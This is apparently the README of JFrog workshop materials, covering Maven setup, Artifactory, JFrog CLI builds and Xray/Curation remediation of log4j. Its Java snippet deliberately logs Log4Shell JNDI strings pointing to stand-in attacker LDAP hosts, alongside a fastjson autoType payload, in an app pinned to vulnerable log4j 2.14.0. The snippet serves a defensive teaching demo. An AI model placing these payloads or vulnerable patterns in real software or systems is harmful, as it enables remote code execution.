This repository contains sample projects and customer training workshop materials for the JFrog Platform (Artifactory, Xray, Curation, etc.). It covers building, deploying, and security scanning across technologies such as Maven, Docker, NPM, Go, .NET, and Python.
Welcome to the JFrog SaaS Trial Workshop! 🎓
By the end of this workshop, you will be able to:
- Apply for a JFrog SaaS trial and set up your environment (repos, Xray, CLI).
- Clone and configure the Maven sample project and connect it to your Artifactory repos.
- Build and deploy the project using JFrog CLI and publish build info.
- Understand and remediate security vulnerabilities using JFrog Xray (scan, review, block, fix).
| Step | Action |
|---|---|
| 1 | Apply for JFrog SaaS trial; select region (e.g. Singapore/Tokyo). |
| 2 | Clone this repo and go to maven-sample. |
| 3 | Create Maven local/remote/virtual repos in Artifactory. |
| 4 | Enable Xray indexing for the repos and the build pattern `**/*`. |
| 5 | Install & configure JFrog CLI (`jf c add`), then Maven (`jf mvnc`). |
| 6 | Build & deploy: `jf mvn clean install` / `jf mvn deploy` / `jf rt bp`. |
| 7 | Verify artifacts and build info in Artifactory. |
| 8 | Review Xray findings, then use Curation to block vulnerable version and fix (e.g. log4j). |
| 9 | Rebuild and confirm the issue is resolved. |
- Install JDK
  - Download and install JDK from OpenJDK
  - Select the JDK 17 (LTS) version
  - Choose the appropriate package for your operating system:
    - Windows: `.zip` archive
    - macOS: `.tar.gz` archive
  - For Windows: extract the `.zip` to a directory like `C:\Program Files\Java\jdk-17`
  - For macOS: extract the `.tar.gz` to `/Library/Java/JavaVirtualMachines/`
- Open System Properties (Win + S → "Environment Variables")
- Click "Environment Variables" → "New" under System variables
- Set:
  - Variable name: `JAVA_HOME`
  - Variable value: `C:\Program Files\Java\jdk-17`
- In System variables, select "Path" → "Edit"
- Click "New" and add: `%JAVA_HOME%\bin`
- Click "OK" to save

```shell
# Check Java version
java -version
```

Expected output:

```
openjdk version "17.0.2" 2022-01-18
OpenJDK Runtime Environment (build 17.0.2+8)
OpenJDK 64-Bit Server VM (build 17.0.2+8, mixed mode, sharing)
```
1️⃣ Download Maven
- Go to the Apache Maven download page
- Download the Binary zip archive (e.g., `apache-maven-3.6.3-bin.zip`)

2️⃣ Extract Maven
- Extract the downloaded ZIP file to a directory, e.g. `C:\Program Files\Apache\Maven`
- Your Maven folder structure should look like: `C:\Program Files\Apache\Maven\apache-maven-3.6.3`

- In System variables, click "New"
- Set:
  - Variable name: `MAVEN_HOME`
  - Variable value: `C:\Program Files\Apache\Maven\apache-maven-3.6.3`
- In the "Path" variable, click "Edit"
- Click "New" and add: `%MAVEN_HOME%\bin`
- Click "OK" on all windows to save
Note: After setting environment variables, you need to open a new Command Prompt for the changes to take effect.
```shell
# Open a new Command Prompt and run:
mvn -version
```

Expected output:

```
Apache Maven 3.6.3 (...)
Maven home: C:\Program Files\Apache\Maven\apache-maven-3.6.3
Java version: 17.0.2, vendor: Oracle Corporation
Java home: C:\Program Files\Java\jdk-17
Default locale: en_US, platform encoding: UTF-8
OS name: "windows 10", version: "10.0", arch: "amd64", family: "windows"
```
- Apply for JFrog SaaS Trial
  - Select "14-Day Free Trial"; it will give you your own JFrog Platform.
- Select AWS Region
  - Choose either the AWS Singapore or Tokyo region
  - This will provide better network performance for users in Asia
  - The region selection is available during the trial signup process
- You will get an email containing the login credentials for the JFrog Platform
```shell
git clone https://github.com/JFrogChina/jfrog-poc-samples.git
cd jfrog-poc-samples/maven-sample
```

- Log in to the JFrog SaaS Platform
- Click Quick Repository Creation (top-right)
- Select Maven and create:
  - Local Repos: `sample-libs-snapshot-local`, `sample-libs-release-local`
  - Remote Repo: `sample-maven-remote`
  - Virtual Repos: `sample-libs-snapshot`, `sample-libs-release`
- Go to Administrator -> Xray Settings → Index Resource
- Add to indexed Repositories: `sample-libs-snapshot-local`, `sample-libs-release-local`
- Configure Index Build by Pattern: `**/*`
- Configure your environment:

  ```shell
  jf c add saas
  ```

  This command will:
  - Add a new JFrog configuration named 'saas'
  - Prompt you to enter your JFrog Platform details
  - Store your credentials securely
  - Set up the connection to your JFrog SaaS instance

  Follow the prompts to enter:
  - JFrog Platform URL: `https://<YOUR_DOMAIN>.jfrog.io`
  - username
  - password

```shell
cd maven-sample
jf mvnc
```

This generates a `.jfrog/projects/maven.yaml` pointing to your SaaS repositories.
Add the code below to `main()` in `DemoApplication.java` (under `jfrog-poc-samples\maven-sample\src\main\java\com\example\jfrog\demo`) so that the application calls the vulnerable log4j function:

```java
public static void main(String[] args) {
    // Deliberately vulnerable workshop code: the messages handed to log4j-core 2.14.0
    // contain a ${jndi:...} lookup, which is what Xray flags as CVE-2021-44228.
    String payload = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://127.0.0.1:1389/Exploit\"}";
    JSON jsonObject = JSON.parseObject(payload);
    logger.info(jsonObject.toString());
    logger.error("${jndi:ldap://somesitehackerofhell.com/z}");
}
```
```shell
jf mvn clean install -f pom.xml --build-name=sample-maven-build --build-number=1
jf mvn deploy --build-name=sample-maven-build --build-number=1
jf rt bp sample-maven-build 1
```

- Check Artifactory → Artifacts for the deployed files
- View the build info in the Builds section
The log4j vulnerability (CVE-2021-44228) is detected because your project uses log4j-core 2.14.0. However, it's only exploitable when:
- Using vulnerable logging patterns:

  ```java
  // Vulnerable
  logger.info("${jndi:ldap://malicious-server/exploit}");
  // Safe
  logger.info("User logged in: {}", username);
  ```

- AND when:
  - Logging user-controlled input
  - The input contains a `${jndi:ldap://...}` pattern
  - The application has network access to the malicious server
This explains why Xray shows many false positives - vulnerabilities exist in code but aren't exploitable in your use case.
JFrog Advanced Security has identified this log4j package as a true positive. You can view the detailed evidence in the security report.

86% of critical/high vulnerabilities are false positives
- Create Block Condition:
  Administrator → Curation Settings → Create Condition
- Clean Cache:

  ```shell
  rm -rf ~/.m2/repository/org/apache/logging/log4j/*
  ```

- Verify Block: rebuilding now fails because Curation answers the download of log4j-core 2.14.0 with 403 Forbidden:

  ```
  [main] ERROR org.apache.maven.cli.MavenCli - Failed to execute goal on project app-boot: Could not resolve dependencies for project com.example.jfrog:app-boot:war:1.0.2: Could not transfer artifact org.apache.logging.log4j:log4j-core:jar:2.14.0 from/to artifactory-release (https://demo.jfrogchina.com/artifactory/alex-maven): authorization failed for https://demo.jfrogchina.com/artifactory/alex-maven/org/apache/logging/log4j/log4j-core/2.14.0/log4j-core-2.14.0.jar, status: 403 Forbidden -> [Help 1]
  ```

- Fix: Update log4j Version

  ```xml
  <dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.17.1</version>
  </dependency>
  ```

- Rebuild:

  ```shell
  jf mvn clean
  jf mvn deploy --build-name=sample-maven-build --build-number=2
  jf rt bp sample-maven-build 2
  ```

The build should complete successfully, confirming that the security issue has been fixed.
Happy building and stay secure! 🚀
| Directory | Description |
|---|---|
| maven-sample | Maven build, deploy and Xray/Curation demo (the main flow of this workshop) |
| docker-sample | Docker image build and push to Artifactory |
| npm-sample | NPM project with JFrog CLI |
| go-sample | Go module build and publish |
| dotnet-sample | .NET project with Artifactory |
| python-sample | Python/pip with PyPI repositories |
| Xray-best-practices | Best practices such as Xray report export and Curation |
| oss-governence | Open-source package governance and policies |
| azure-devops-integration | Azure DevOps and JFrog integration |
| cloudbees-jenkins-integration | Jenkins/CloudBees and JFrog integration |